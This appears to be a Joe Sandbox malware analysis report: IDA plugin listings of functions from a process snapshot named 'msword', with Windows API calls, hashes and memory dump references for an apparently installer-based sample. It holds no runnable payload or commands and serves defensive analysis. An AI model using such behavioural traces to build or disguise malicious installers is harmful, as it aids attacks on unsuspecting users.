                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                        Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                        Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                        Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                        • String ID:
                                                                                        • API String ID: 4115351271-0
                                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                        Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                        Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                        Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                        Non-executed Functions

                                                                                        Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $ @$M$N
                                                                                        • API String ID: 1638840714-3479655940
                                                                                        • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                        • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                        Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
